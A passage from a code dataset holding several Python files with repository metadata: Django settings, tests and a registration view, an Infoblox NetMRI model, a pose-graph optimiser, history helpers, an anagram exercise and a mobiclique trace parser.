used to specify which packages to check for.
Returns:
(Iterator[str]): Lines with ``identifier`` as the prefix.
"""
prefix = f"{identifier} "
if isinstance(strings, str):
for string in strings.splitlines():
string = string.strip()
# Return only optional requirement lines
if string and string.startswith(prefix):
yield string[len(prefix) :]
else:
for string_item in strings:
for string in _yield_lines(string_item, identifier):
yield string
def _split_type_and_name(string: str) -> Tuple[str, str]:
"""Split an optional requirement line into the requirement type and
name.
"""
return string[:PKD_REQ_TYPE_LEN], string[PKD_REQ_TYPE_LEN:]
| 37.113772
| 93
| 0.649564
| 855
| 0.137948
| 2,099
| 0.338658
| 588
| 0.094869
| 0
| 0
| 3,254
| 0.525008
|
49e20e1482e371d2d36af2e6abc0d413c62cd098
| 1,119
|
py
|
Python
|
src/myproject/settings/admin_mail_console_handler.py
|
thinkAmi/DjangoCongress_JP_2019_talk
|
0b746f62808d979c1570de80084686f709996e1d
|
[
"Unlicense"
] | 1
|
2019-05-18T04:34:59.000Z
|
2019-05-18T04:34:59.000Z
|
src/myproject/settings/admin_mail_console_handler.py
|
thinkAmi/DjangoCongress_JP_2019_talk
|
0b746f62808d979c1570de80084686f709996e1d
|
[
"Unlicense"
] | null | null | null |
src/myproject/settings/admin_mail_console_handler.py
|
thinkAmi/DjangoCongress_JP_2019_talk
|
0b746f62808d979c1570de80084686f709996e1d
|
[
"Unlicense"
] | null | null | null |
from .base import *
# 後で確認できるよう、ファイルとして残しておく
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
# filebasedを使う場合は、メールの保存先も指定すること
# '.' の場合、カレントディレクトリに保存される
# EMAIL_FILE_PATH = '.'
EMAIL_FILE_PATH = str(pathlib.Path(BASE_DIR).joinpath('logs'))
ADMINS = [('Admin1', 'admin1@example.com')]
# 開発モードでもADMINSへエラー通知メールを送信する
DEBUG = True
# EMAIL_BACKENDの設定とは別に、エラー通知メールはコンソール出力にする
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'email_backend':
'django.core.mail.backends.console.EmailBackend',
}
},
'loggers': {
'django': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
},
}
}
| 25.431818
| 66
| 0.570152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 871
| 0.649515
|
49e262c808a1276127a4a16b770e3d39b6997140
| 7,494
|
py
|
Python
|
core/tests/machine_request.py
|
xuhang57/atmosphere
|
f53fea2a74ee89ccc8852906799b1d9a7e9178b7
|
[
"BSD-3-Clause"
] | null | null | null |
core/tests/machine_request.py
|
xuhang57/atmosphere
|
f53fea2a74ee89ccc8852906799b1d9a7e9178b7
|
[
"BSD-3-Clause"
] | null | null | null |
core/tests/machine_request.py
|
xuhang57/atmosphere
|
f53fea2a74ee89ccc8852906799b1d9a7e9178b7
|
[
"BSD-3-Clause"
] | null | null | null |
from dateutil.relativedelta import relativedelta
from uuid import uuid4
import unittest
import pytz
from django.test import TestCase
from django.utils.timezone import datetime
from core.tests.helpers import CoreProviderMachineHelper, CoreMachineRequestHelper, CoreInstanceHelper
from service.machine import process_machine_request
class CoreMachineRequestTestCase(unittest.TestCase):
"""
Add here any specific assertions to a 'MachineRequest' test case
"""
# Super-helpful private methods
def _new_instance_of(self, machine, start_date):
# Create an instance of this machine
instance_helper = CoreInstanceHelper(
"Mock Instance", uuid4(),
start_date, machine=machine)
instance = instance_helper.to_core_instance()
return instance
def _process_new_fork_request(
self,
machine,
new_name,
new_version,
uuid_suffix,
fork_date=None):
if not fork_date:
fork_date = self.start_time
instance = self._new_instance_of(machine, fork_date)
# Create a MachineRequest for newly created Instance
new_app_request_helper = CoreMachineRequestHelper(
new_name, fork_date, new_version, True, instance)
new_app_request = new_app_request_helper.to_core_machine_request()
process_machine_request(new_app_request, 'machine-%s' % uuid_suffix,
update_cloud=False)
new_machine = new_app_request.new_machine
return new_machine
def _process_new_update_request(
self,
machine,
new_name,
new_version,
uuid_suffix,
update_date=None):
if not update_date:
update_date = self.start_time
instance = self._new_instance_of(machine, update_date)
update_request_helper = CoreMachineRequestHelper(
new_name, update_date, new_version, False, instance)
core_request = update_request_helper.to_core_machine_request()
process_machine_request(core_request, 'machine-%s' % uuid_suffix,
update_cloud=False)
new_machine = core_request.new_machine
return new_machine
# Custom assertions
def assertMachineVersionEquals(self, machine, version_test):
self.assertEqual(machine.version, version_test)
def assertApplicationNameEquals(self, machine, name_test):
self.assertEqual(machine.application.name, name_test)
class TestVersionAndForking(CoreMachineRequestTestCase):
def setUp(self):
self.start_time = datetime(2015, 1, 1, tzinfo=pytz.utc)
provider_machine_helper = CoreProviderMachineHelper(
'First machine', 'machine-1', 'openstack', self.start_time)
self.machine_1 = provider_machine_helper.to_core_machine()
self.instance_helper = CoreInstanceHelper(
"test_instance", "1234-1234-1234-1234",
self.start_time, machine=self.machine_1)
self.instance_1 = self.instance_helper.to_core_instance()
pass
def test_single_version_updating(self):
"""
This test meant to represent which rules will succed/fail as
'acceptable' versions. Currently, all version strings are acceptable.
As these rules change, the tests will change/grow..
"""
provider_machine_helper = CoreProviderMachineHelper(
'Test Versioning',
'machine-version-1',
'openstack',
self.start_time)
machine_1 = provider_machine_helper.to_core_machine()
machine_1.update_version('1')
self.assertMachineVersionEquals(machine_1, '1')
machine_1.update_version('1.2.1')
self.assertMachineVersionEquals(machine_1, '1.2.1')
machine_1.update_version('one-two-two')
self.assertMachineVersionEquals(machine_1, 'one-two-two')
machine_1.update_version('man-bear-pig')
self.assertMachineVersionEquals(machine_1, 'man-bear-pig')
pass
def test_update_then_fork(self):
provider_machine_helper = CoreProviderMachineHelper(
'New Machine', 'new-machine-1', 'openstack', self.start_time)
machine_1 = provider_machine_helper.to_core_machine()
machine_2 = self._process_new_update_request(
machine_1,
"New Name, Same Version",
"2.0",
2)
self.assertApplicationNameEquals(machine_2, "New Name, Same Version")
self.assertMachineVersionEquals(machine_2, "2.0")
machine_3 = self._process_new_fork_request(
machine_2,
"Totally different",
"1.0",
3)
self.assertApplicationNameEquals(machine_3, "Totally different")
self.assertMachineVersionEquals(machine_3, "1.0")
pass
def test_complex_fork_tree(self):
# Boot strap the first machine
provider_machine_helper = CoreProviderMachineHelper(
'Complex Fork Test-New Machine',
'new-machine-1234', 'openstack', self.start_time)
machine_1 = provider_machine_helper.to_core_machine()
machine_2 = self._process_new_update_request(
machine_1, machine_1.application.name, "2.0", 2)
self.assertApplicationNameEquals(machine_2, machine_1.application.name)
self.assertMachineVersionEquals(machine_2, "2.0")
machine_3 = self._process_new_update_request(
machine_1, machine_1.application.name, "3.0", 3)
self.assertApplicationNameEquals(machine_3, machine_1.application.name)
self.assertMachineVersionEquals(machine_3, "3.0")
machine_4 = self._process_new_update_request(
machine_1, machine_1.application.name, "4.0", 4)
self.assertApplicationNameEquals(machine_4, machine_1.application.name)
self.assertMachineVersionEquals(machine_4, "4.0")
self.assertApplicationNameEquals(machine_1, machine_4.application.name)
fork_level_2 = self._process_new_fork_request(
machine_2, "I am not machine 2", "1.0.0", 5)
self.assertNotEqual(fork_level_2.application.name,
machine_2.application.name)
update_fork_2 = self._process_new_update_request(
fork_level_2, "not machine 2, but an update", "2.0.0", 6)
self.assertApplicationNameEquals(
fork_level_2,
"not machine 2, but an update")
self.assertApplicationNameEquals(
update_fork_2,
"not machine 2, but an update")
self.assertMachineVersionEquals(fork_level_2, "1.0.0")
self.assertMachineVersionEquals(update_fork_2, "2.0.0")
fork_level_3 = self._process_new_fork_request(
machine_3, "I am different from machine 3", "3.0.5", 7)
self.assertNotEqual(fork_level_3.application.name,
machine_3.application.name)
update_fork_3 = self._process_new_update_request(
fork_level_3, fork_level_3.application.name, "3.0.6", 8)
self.assertApplicationNameEquals(
fork_level_3,
"I am different from machine 3")
self.assertApplicationNameEquals(
update_fork_3,
"I am different from machine 3")
self.assertMachineVersionEquals(fork_level_3, "3.0.5")
self.assertMachineVersionEquals(update_fork_3, "3.0.6")
pass
| 40.508108
| 102
| 0.665999
| 7,153
| 0.954497
| 0
| 0
| 0
| 0
| 0
| 0
| 1,197
| 0.159728
|
49e3a9de96ed6a59b374bbb066c35f87db59257f
| 3,455
|
py
|
Python
|
infoblox_netmri/api/remote/models/device_zone_remote.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/remote/models/device_zone_remote.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/remote/models/device_zone_remote.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..remote import RemoteModel
from infoblox_netmri.utils.utils import check_api_availability
class DeviceZoneRemote(RemoteModel):
"""
Zones defined on a traffic filtering device. On devices that do not natively support zones (e.g., Cisco routers), there is one zone per interface, plus an additional 'internal' zone.
| ``DeviceZoneID:`` The internal NetMRI identifier for this filtering zone.
| ``attribute type:`` number
| ``DeviceID:`` The internal NetMRI identifier for the device to which this zone belongs.
| ``attribute type:`` number
| ``DataSourceID:`` The internal NetMRI identifier for the collector NetMRI that collected this data record.
| ``attribute type:`` number
| ``ZoneFirstSeenTime:`` The timestamp of when NetMRI first discovered this service.
| ``attribute type:`` datetime
| ``ZoneStartTime:`` The starting effective time of this record.
| ``attribute type:`` datetime
| ``ZoneEndTime:`` The ending effective time of this record, or empty if still in effect.
| ``attribute type:`` datetime
| ``ZoneTimestamp:`` The date and time this record was collected or calculated.
| ``attribute type:`` datetime
| ``ZoneChangedCols:`` The fields that changed between this revision of the record and the previous revision.
| ``attribute type:`` string
| ``ZoneName:`` The name of the zone.
| ``attribute type:`` string
| ``ZoneProvisionData:`` Internal data - do not modify, may change without warning.
| ``attribute type:`` string
| ``ZoneInterfaceCount:`` The total number of interfaces connected to this zone.
| ``attribute type:`` number
| ``ZoneInterfaceID:`` The internal NetMRI identifier of that interface, if only one interface connected to this zone.
| ``attribute type:`` number
| ``ZoneArtificialInd:`` A flag indicating that this zone has no counterpart in the device configuration.
| ``attribute type:`` bool
"""
properties = ("DeviceZoneID",
"DeviceID",
"DataSourceID",
"ZoneFirstSeenTime",
"ZoneStartTime",
"ZoneEndTime",
"ZoneTimestamp",
"ZoneChangedCols",
"ZoneName",
"ZoneProvisionData",
"ZoneInterfaceCount",
"ZoneInterfaceID",
"ZoneArtificialInd",
)
@property
@check_api_availability
def data_source(self):
"""
The collector NetMRI that collected this data record.
``attribute type:`` model
"""
return self.broker.data_source(**{"DeviceZoneID": self.DeviceZoneID })
@property
@check_api_availability
def zone_interface(self):
"""
The Interface linked to this zone (if only one interface linked to this zone)
``attribute type:`` model
"""
return self.broker.zone_interface(**{"DeviceZoneID": self.DeviceZoneID })
@property
@check_api_availability
def device(self):
"""
The device from which this data was collected.
``attribute type:`` model
"""
return self.broker.device(**{"DeviceZoneID": self.DeviceZoneID })
| 31.697248
| 186
| 0.600868
| 3,347
| 0.968741
| 0
| 0
| 802
| 0.232127
| 0
| 0
| 2,524
| 0.730535
|
49e3eb2356e1b76dcdb5820a9f4030de1c698ff6
| 1,510
|
py
|
Python
|
nitmis_admin/controllers/register.py
|
kalesh13/nitmis
|
b8c73f74411bbad441557c6553cbbd35acc5a5ee
|
[
"MIT"
] | null | null | null |
nitmis_admin/controllers/register.py
|
kalesh13/nitmis
|
b8c73f74411bbad441557c6553cbbd35acc5a5ee
|
[
"MIT"
] | 5
|
2020-07-19T10:28:57.000Z
|
2021-08-19T18:25:28.000Z
|
nitmis_admin/controllers/register.py
|
kalesh13/nitmis
|
b8c73f74411bbad441557c6553cbbd35acc5a5ee
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response
from django.shortcuts import render
from django.http.response import JsonResponse
from nitmis_admin.serializers.UserSerializer import UserSerializer
def create_user(role="Guest"):
"""
"""
def fun_wrapper(func):
def wrapper(*args, **kwargs):
serializer = UserSerializer(data=args[1].data)
#
# If the data is valid, create a new user
# and return the access token details.
if serializer.is_valid():
serializer.save(role=role)
return JsonResponse(serializer.data)
return JsonResponse({"errors": serializer.errors}, status=422)
return wrapper
return fun_wrapper
class Register(APIView):
'''
Parent register controller. Post requests create
a general Guest account
'''
def get(self, request):
'''
Renders the base layout on GET request. Frontend
handles the rendering of forms
'''
return render(request, 'base.html')
@create_user()
def post(self, request):
'''
Registers a new user and assigns the user
a Guest role.
'''
class AdminRegister(Register):
'''
Register controller for administrators.
'''
@create_user(role="Administrator")
def post(self, request):
'''
Overriden post function. Registers the user as
an administrator
'''
| 26.491228
| 74
| 0.625828
| 722
| 0.478146
| 0
| 0
| 306
| 0.202649
| 0
| 0
| 572
| 0.378808
|
49e46e9b59b725cb283f9125430ec7a34bd75825
| 9,521
|
py
|
Python
|
3_0_pgo_icp/solution/pose_graph_optimization/assignment_I_2/pgo_2D.py
|
karanchawla/ai_for_robotics
|
03bb66bae99bac3acd79bc1ec6d3b9c0eeabcdf8
|
[
"BSD-3-Clause"
] | 65
|
2017-03-03T07:30:28.000Z
|
2021-08-19T01:12:47.000Z
|
3_0_pgo_icp/solution/pose_graph_optimization/assignment_I_2/pgo_2D.py
|
karanchawla/ai_for_robotics
|
03bb66bae99bac3acd79bc1ec6d3b9c0eeabcdf8
|
[
"BSD-3-Clause"
] | 4
|
2017-03-02T13:51:40.000Z
|
2017-11-01T16:49:22.000Z
|
3_0_pgo_icp/solution/pose_graph_optimization/assignment_I_2/pgo_2D.py
|
ethz-asl/ai_for_robotics
|
03bb66bae99bac3acd79bc1ec6d3b9c0eeabcdf8
|
[
"BSD-3-Clause"
] | 43
|
2017-03-02T11:31:21.000Z
|
2020-10-30T07:10:59.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 2 10:00 2017
@author: Timo Hinzmann (hitimo@ethz.ch)
"""
import math
from math import floor, ceil
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import linalg as sla
from scipy import array, linalg, dot
from enum import Enum
import copy
import pylab
# References:
# [1] Grisetti, Kuemmerle, Stachniss et al. "A Tutorial on Graph-Based SLAM"
# Pose-graph optimization closely following Algorithm 1, 2D from [1].
class PoseGraphOptimization2D():
def __init__(self, vertices, constraints):
self.vertices = vertices
self.constraints = constraints
# State x := [x,y,theta].
self.x = self.vertices[:, 1:]
self.index_x = 0
self.index_y = 1
self.index_theta = 2
# Dimensions.
self.num_nodes = self.vertices.shape[0]
self.dimensions = 3
self.num_states = self.dimensions * self.num_nodes
# Residual of the constraint [dim.: 3x1]
def e_ij(self, R_ij, R_i, t_i, t_j, t_ij, theta_i, theta_j, theta_ij):
# Equation (30).
e_ij = np.zeros([3, 1])
# 2x1 block
e_ij[0:2, 0] = np.dot(R_ij.T, np.dot(R_i.T,(t_j - t_i)) - t_ij).reshape(2)
e_ij[2, 0] = theta_j - theta_i - theta_ij
return e_ij
# 2D rotation matrix [dim.: 2x2]
def R_i(self, theta_i):
# Equation (31).
R_i = np.zeros([2, 2])
R_i[0, 0] = np.cos(theta_i)
R_i[0, 1] = -np.sin(theta_i)
R_i[1, 0] = np.sin(theta_i)
R_i[1, 1] = np.cos(theta_i)
return R_i
# Derivate of 2D rotation matrix wrt. theta [dim.: 2x2]
def dR_i(self, theta_i):
# Required for equation (32).
dR_i = np.zeros([2, 2])
dR_i[0, 0] = -np.sin(theta_i)
dR_i[0, 1] = -np.cos(theta_i)
dR_i[1, 0] = np.cos(theta_i)
dR_i[1, 1] = -np.sin(theta_i)
return dR_i
# Derivative of error function wrt. x_i [dim.: 3x3]
def A_ij(self, R_ij, R_i, dR_i, t_j, t_i):
# Equation (32).
# The dimension of A_ij is [num_states x num_states]
A_ij = np.zeros([3, 3])
# 2x2 block
A_ij[0:2, 0:2] = -np.dot(R_ij.T, R_i.T)
# 2x1 block
A_ij[0:2, 2] = np.dot(np.dot(R_ij.T, dR_i.T), (t_j-t_i)).reshape(2)
A_ij[2, 2] = -1.0
return A_ij
# Derivative of error function wrt. x_j [dim.: 3x3]
def B_ij(self, R_ij, R_i):
# Equation (33).
# The dimension of B_ij is [num_states x num_states]
B_ij = np.zeros([3, 3])
# 2x2 block
B_ij[0:2, 0:2] = np.dot(R_ij.T, R_i.T)
B_ij[2, 2] = 1.0
return B_ij
# Normalize angles to [-pi,pi).
def normalizeAngles(self, theta):
# Iterate through the nodes and normalize the angles.
for i in range(0, self.num_nodes):
while theta[i] < -math.pi:
theta += 2 * math.pi
while theta[i] >= math.pi:
theta -= 2 * math.pi
return theta
def optimizePoseGraph(self):
# Maximum number of optimization iterations to avoid getting stuck
# in infinite while loop.
max_number_optimization_iterations = 1000
optimization_iteration_counter = 0
optimization_error = np.inf
tolerance = 1.0e-11
t_i = np.zeros([2, 1])
t_j = np.zeros([2, 1])
t_ij = np.zeros([2, 1])
Omega_ij = np.zeros([3, 3])
# Make sure we achieve the desired accuracy.
while optimization_error > tolerance:
# num_states = 3 * num_nodes (since x,y,theta)
H = np.zeros([self.num_states, self.num_states])
b = np.zeros([self.num_states, 1])
# Iterate over all constraints.
for constraint in self.constraints:
# Node i.
i = int(constraint[0])
# Node j.
j = int(constraint[1])
# Relative translation from node i to node j,
t_ij[self.index_x] = constraint[2]
t_ij[self.index_y] = constraint[3]
# Relative rotation from node i to node j.
theta_ij = constraint[4]
# *Global* position of node i (initial guess).
t_i[self.index_x] = self.x[i, self.index_x]
t_i[self.index_y] = self.x[i, self.index_y]
# *Global* position of node j (initial guess).
t_j[self.index_x] = self.x[j, self.index_x]
t_j[self.index_y] = self.x[j, self.index_y]
# *Global* orientation of node i (initial guess).
theta_i = self.x[i, self.index_theta]
# *Global* orientation of node j (initial guess).
theta_j = self.x[j, self.index_theta]
# Information matrix Omega.
# First row.
Omega_ij[0, 0] = constraint[5]
Omega_ij[0, 1] = constraint[6]
Omega_ij[0, 2] = constraint[7]
# Second row.
Omega_ij[1, 0] = constraint[6]
Omega_ij[1, 1] = constraint[8]
Omega_ij[1, 2] = constraint[9]
# Third row.
Omega_ij[2, 0] = constraint[7]
Omega_ij[2, 1] = constraint[9]
Omega_ij[2, 2] = constraint[10]
# Compute R_ij, the *local* rotation matrix from node i to node j.
R_ij = self.R_i(theta_ij)
# Compute R_i, the *global* orientation of node i.
R_i = self.R_i(theta_i)
# Compute R_j, the *global* orientation of node j.
R_j = self.R_i(theta_j)
# Compute dR_i, the derivate of R_i wrt. theta_i.
dR_i = self.dR_i(theta_i)
# Compute the derivative of the error function wrt. x_i.
A_ij = self.A_ij(R_ij, R_i, dR_i, t_j, t_i)
# Compute the derivate of the error function wrt. x_j.
B_ij = self.B_ij(R_ij, R_i)
# Compute the residual of the constraint connecting node i and node j
e_ij = self.e_ij(R_ij, R_i, t_i, t_j, t_ij, theta_i, theta_j, theta_ij)
# Make sure to get the indices right...
# i=0: b[0:3]; i=1: b[3:6]; ...
# j=1: b[3:6]; i=2: b[6:9]; ...
i_r = 3*i
i_c = 3*i+3
j_r = 3*j
j_c = 3*j+3
# Compute the coefficient vector.
# b_i
b[i_r:i_c] += np.dot(A_ij.T, np.dot(Omega_ij, e_ij)).reshape(3, 1)
# b_j
b[j_r:j_c] += np.dot(B_ij.T, np.dot(Omega_ij, e_ij)).reshape(3, 1)
# Compute the contribution of this constraint to the linear system.
# H_ii
H[i_r:i_c,i_r:i_c] += np.dot(A_ij.T, np.dot(Omega_ij, A_ij))
# H_ij
H[i_r:i_c,j_r:j_c] += np.dot(A_ij.T, np.dot(Omega_ij, B_ij))
# H_ji
H[j_r:j_c,i_r:i_c] += np.dot(B_ij.T, np.dot(Omega_ij, A_ij))
# H_jj
H[j_r:j_c,j_r:j_c] += np.dot(B_ij.T, np.dot(Omega_ij, B_ij))
# Keep the first node fixed.
H[0:3, 0:3] += np.eye(3, 3)
# Solve the linear system.
delta_x = sla.spsolve(H, -b)
delta_x = delta_x.reshape(self.num_nodes, self.dimensions)
# Equation (34): Update the states by applying the increments.
self.x += delta_x
# Save the current optimization error.
optimization_error = np.linalg.norm(delta_x, 2)
# Maximum number of optimization iterations to avoid getting stuck
# in infinite while loop.
optimization_iteration_counter += 1
if optimization_iteration_counter > max_number_optimization_iterations:
print "WARNING! Reached max. number of iterations before converging to desired tolerance!"
break
print "Optimization iter.: ", optimization_iteration_counter, " optimization error: ", optimization_error
# The angles are normalized to [-pi,pi) *after* applying the increments.
self.x[:, self.index_theta] = self.normalizeAngles(self.x[:, self.index_theta])
return self.x
def main():
# Relative path to data from exercise sheet.
base = "../../../pose_graph_optimization/assignment_I_2/"
# Load the input data.
vertices = np.genfromtxt(open(base + "vertices.dat"))
edges = np.genfromtxt(open(base + "edges.dat"))
lc = np.genfromtxt(open(base + "loop_closures.dat"))
# Edges and loop-closures are constraints that can be handled the same
# way in the pose graph optimization backend as remarked in the exercise sheet.
all_constraints = []
all_constraints = np.append(edges, lc, axis = 0)
# Plot the initial values.
pylab.plot(vertices[:, 1], vertices[:, 2], 'b')
plt.pause(1)
# Perform the 2D pose graph optimization according to [1], Algorithm 1, 2D
pgo = PoseGraphOptimization2D(vertices, all_constraints)
x_opt = pgo.optimizePoseGraph()
# Save the optimized states in rows: [x_0, y_0, th_0; x_1, y_1, th_1; ...]
np.savetxt('results_2D.txt', np.transpose(x_opt))
# Plot the optimized values.
pylab.plot(x_opt[:,0], x_opt[:,1], 'g')
plt.pause(5)
if __name__ == "__main__":
main()
| 36.619231
| 119
| 0.553513
| 7,911
| 0.8309
| 0
| 0
| 0
| 0
| 0
| 0
| 3,065
| 0.32192
|
49e502e61c40a6d5ce473d9fc363be1b2927b0ab
| 1,019
|
py
|
Python
|
simple_history/management/commands/_populate_utils.py
|
SummitESP/django-simple-history
|
78c929159263dd583bd4d8d5a28a274a9ad6be0b
|
[
"BSD-3-Clause"
] | null | null | null |
simple_history/management/commands/_populate_utils.py
|
SummitESP/django-simple-history
|
78c929159263dd583bd4d8d5a28a274a9ad6be0b
|
[
"BSD-3-Clause"
] | 1
|
2018-01-09T20:51:34.000Z
|
2018-01-09T20:51:34.000Z
|
simple_history/management/commands/_populate_utils.py
|
SummitESP/django-simple-history
|
78c929159263dd583bd4d8d5a28a274a9ad6be0b
|
[
"BSD-3-Clause"
] | null | null | null |
from django.utils.timezone import now
class NotHistorical(TypeError):
"""No related history model found."""
def get_history_model_for_model(model):
"""Find the history model for a given app model."""
try:
manager_name = model._meta.simple_history_manager_attribute
except AttributeError:
raise NotHistorical("Cannot find a historical model for "
"{model}.".format(model=model))
return getattr(model, manager_name).model
def bulk_history_create(model, history_model):
"""Save a copy of all instances to the historical model."""
historical_instances = [
history_model(
history_date=getattr(instance, '_history_date', now()),
history_user=getattr(instance, '_history_user', None),
**dict((field.attname, getattr(instance, field.attname))
for field in instance._meta.fields)
) for instance in model.objects.all()]
history_model.objects.bulk_create(historical_instances)
| 36.392857
| 68
| 0.677134
| 73
| 0.071639
| 0
| 0
| 0
| 0
| 0
| 0
| 224
| 0.219823
|
49e6d32460dd6b58678d99ca2b2edccf4f319501
| 1,174
|
py
|
Python
|
anagrams.py
|
zubrik13/coding_intrv_prer
|
853a7c8357ad43601313daadcc1c494d403a9aa0
|
[
"MIT"
] | null | null | null |
anagrams.py
|
zubrik13/coding_intrv_prer
|
853a7c8357ad43601313daadcc1c494d403a9aa0
|
[
"MIT"
] | null | null | null |
anagrams.py
|
zubrik13/coding_intrv_prer
|
853a7c8357ad43601313daadcc1c494d403a9aa0
|
[
"MIT"
] | null | null | null |
"""
A student is taking a cryptography class and has found anagrams to be very useful.
Two strings are anagrams of each other if the first string's letters can be
rearranged to form the second string. In other words, both strings must
contain the same exact letters in the same exact frequency. For example,
bacdc and dcbac are anagrams, but bacdc and dcbad are not.
The student decides on an encryption scheme that involves two large strings.
The encryption is dependent on the minimum number of character deletions
required to make the two strings anagrams. Determine this number.
Given two strings, a and b, that may or may not be of the same length,
determine the minimum number of character deletions required to make
a and b anagrams. Any characters can be deleted from either of the strings.
"""
a = 'ceed'
b = 'acbeef'
total_len = len(a) + len(b)
match_counter = 0
c = list(a)
d = list(b)
if len(a) <= len(b):
for i in c:
if i in d:
match_counter += 2
d.remove(i)
else:
for i in d:
if i in c:
match_counter += 2
c.remove(i)
min_num = total_len - match_counter
print(min_num)
| 30.894737
| 83
| 0.70017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 824
| 0.701874
|
49e795b64e0b3cac7465448efafac4bd98ed4236
| 267
|
py
|
Python
|
PhoenixNow/login.py
|
ECGHelloWorld/PhoenixNow
|
88f98f59a91a4e99763ae4432df7945d811b63bf
|
[
"MIT"
] | 2
|
2017-02-06T15:42:27.000Z
|
2021-01-14T15:13:08.000Z
|
PhoenixNow/login.py
|
ECGHelloWorld/PhoenixNow
|
88f98f59a91a4e99763ae4432df7945d811b63bf
|
[
"MIT"
] | null | null | null |
PhoenixNow/login.py
|
ECGHelloWorld/PhoenixNow
|
88f98f59a91a4e99763ae4432df7945d811b63bf
|
[
"MIT"
] | 6
|
2016-07-30T19:57:19.000Z
|
2019-08-06T03:44:54.000Z
|
from flask_login import LoginManager
from PhoenixNow.model import User
login_manager = LoginManager()
login_manager.login_view = "regular.signin"
@login_manager.user_loader
def load_user(user_id):
user = User.query.filter_by(id=user_id).first()
return user
| 24.272727
| 51
| 0.794007
| 0
| 0
| 0
| 0
| 118
| 0.441948
| 0
| 0
| 16
| 0.059925
|
49e8bc016b4a92e63bbff49dadf2d0f5ff48a5c0
| 7,673
|
py
|
Python
|
mobi_parse_data.py
|
josting/CS538_Project
|
b503de4f8e632166f715bb28b621d21770e3142e
|
[
"MIT"
] | null | null | null |
mobi_parse_data.py
|
josting/CS538_Project
|
b503de4f8e632166f715bb28b621d21770e3142e
|
[
"MIT"
] | null | null | null |
mobi_parse_data.py
|
josting/CS538_Project
|
b503de4f8e632166f715bb28b621d21770e3142e
|
[
"MIT"
] | null | null | null |
import os
import datetime as dt
import random
import networkx
# import matplotlib as mpl
import matplotlib.pyplot as plt
from const import *
activity = {}
with open(os.path.join(DATA_DIR, "mobiclique", "activity.csv")) as activity_fd:
for line in activity_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
user_id, start_ts, end_ts = line.split(';')
if user_id not in activity:
activity[user_id] = []
activity[user_id].append( (int(start_ts), int(end_ts)) )
def is_awake(user_id, ts, activity):
for start_ts, end_ts in activity.get(user_id, []):
if ts >= start_ts and ts <= end_ts:
return True
return False
transmission = {}
with open(os.path.join(DATA_DIR, "mobiclique", "transmission.csv")) as transmission_fd:
for line in transmission_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
msg_type, msg_id, bytes, src_user_id, dst_user_id, ts, status = line.split(';')
#if status != '0':
# continue
if src_user_id not in transmission:
transmission[src_user_id] = {}
if dst_user_id not in transmission[src_user_id]:
transmission[src_user_id][dst_user_id] = []
ts = int(ts)
transmission[src_user_id][dst_user_id].append(ts)
reception = {}
with open(os.path.join(DATA_DIR, "mobiclique", "reception.csv")) as reception_fd:
for line in reception_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
msg_type, msg_id, src_user_id, dst_user_id, ts = line.split(';')
if src_user_id not in reception:
reception[src_user_id] = {}
if dst_user_id not in reception[src_user_id]:
reception[src_user_id][dst_user_id] = []
ts = int(ts)
reception[src_user_id][dst_user_id].append(ts)
drift_dict = {}
for src_user_id in sorted(reception):
for dst_user_id in sorted(reception[src_user_id]):
for rcp_ts in reception[src_user_id][dst_user_id]:
if src_user_id not in transmission:
continue
transmissions = transmission[src_user_id].get(dst_user_id, None)
if transmissions is None:
continue
if (src_user_id, dst_user_id) not in drift_dict:
drift_dict[(src_user_id, dst_user_id)] = []
diff = [abs(rcp_ts - trn_ts) for trn_ts in transmissions]
idx = diff.index(min(diff))
trn_ts = transmission[src_user_id][dst_user_id][idx]
drift = trn_ts - rcp_ts
drift_dict[(src_user_id, dst_user_id)].append((trn_ts, drift))
for (src_user_id, dst_user_id) in sorted(drift_dict):
print src_user_id, dst_user_id, drift_dict[(src_user_id, dst_user_id)]
break
proximity = {}
with open(os.path.join(DATA_DIR, "mobiclique", "proximity.csv")) as proximity_fd:
for line in proximity_fd.readlines():
line = line.strip()
if "#" in line:
line = line[:line.index("#")]
if not line:
continue
ts, user_id, seen_user_id, major_code, minor_code = line.split(';')
ts = int(ts)
if ts not in proximity:
proximity[ts] = []
proximity[ts].append((user_id, seen_user_id))
def visit(node, edges, unvisited):
if node not in unvisited:
return []
unvisited.remove(node)
my_network = [node]
for (node1, node2) in edges:
if node == node1 and node2 in unvisited:
my_network.extend(visit(node2, edges, unvisited))
elif node == node2 and node1 in unvisited:
my_network.extend(visit(node1, edges, unvisited))
return my_network
def get_networks(nodes, edges):
networks = []
unvisited = list(nodes)
while unvisited:
node = unvisited[0]
my_network = []
networks.append(visit(node, edges, unvisited))
return map(sorted,(map(set,networks)))
MAX_RNG = 75
timestamps = sorted(proximity)
#write traces to user.dat files
if 0:
user_fds = {}
for ts in timestamps:
for (user_id, seen_id) in proximity[ts]:
if user_id not in user_fds:
fd = open(r"mobiclique\%s.dat" % user_id, 'w')
last_ts = -1
user_fds[user_id] = [fd, last_ts]
else:
[fd, last_ts] = user_fds[user_id]
if last_ts != ts:
if last_ts > 0:
fd.write('\n')
fd.write("{} {} {}".format(ts, user_id, seen_id))
